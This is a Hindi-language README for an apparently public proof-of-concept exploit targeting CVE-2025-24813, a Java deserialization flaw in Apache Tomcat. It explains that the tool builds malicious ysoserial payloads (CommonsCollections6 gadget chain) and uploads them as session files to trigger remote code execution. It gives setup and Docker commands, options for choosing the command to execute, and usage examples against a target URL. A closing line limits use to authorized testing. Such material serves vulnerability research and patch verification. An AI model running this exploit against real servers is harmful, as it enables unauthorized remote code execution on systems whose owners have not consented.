
CVE-2025-24813 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉयट, जो Apache Tomcat में एक Java डिसीरियलाइज़ेशन भेद्यता है। दुर्भावनापूर्ण सीरियलाइज़्ड पेलोड उत्पन्न करता है और रिमोट कोड निष्पादन को ट्रिगर करने के लिए उन्हें सत्र फ़ाइलों के रूप में अपलोड करता है।
यह रिपॉजिटरी CVE-2025-24813 के लिए एक प्रमाण-अवधारणा शोषण है, जो Apache Tomcat में एक जावा डिसीरियलाइज़ेशन कमजोरी है।
पर आधारित absholi7ly/POC-CVE-2025-24813/।
निर्भरताएँ स्थापित करें:
uv venv
source .venv/bin/activate
uv sync
ysoserial डाउनलोड करें:
./download.sh
एक कंटेनर में शोषण बनाएँ और चलाएँ:
docker build -t cve-2025-24813-poc:latest .
docker run --rm -it --mount "type=bind,src=$(pwd),target=/app" cve-2025-24813-poc:latest
python main.py <target>
शोषण को सीधे चलाएँ:
python main.py <target_url> [options]
--command: निष्पादित करने का आदेश (डिफ़ॉल्ट: calc.exe)--ysoserial: ysoserial.jar का पथ (डिफ़ॉल्ट: ./ysoserial-all.jar)--gadget: ysoserial गैजेट श्रृंखला (डिफ़ॉल्ट: CommonsCollections6)--payload_type: पेलोड प्रकार - ysoserial या java (डिफ़ॉल्ट: ysoserial)--no-ssl-verify: SSL सत्यापन अक्षम करें# Basic usage
python main.py http://target:8080
# Custom command
python main.py http://target:8080 --command "whoami"
# Using Java payload instead of ysoserial
python main.py http://target:8080 --payload_type java
यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। उन प्रणालियों के विरुद्ध उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।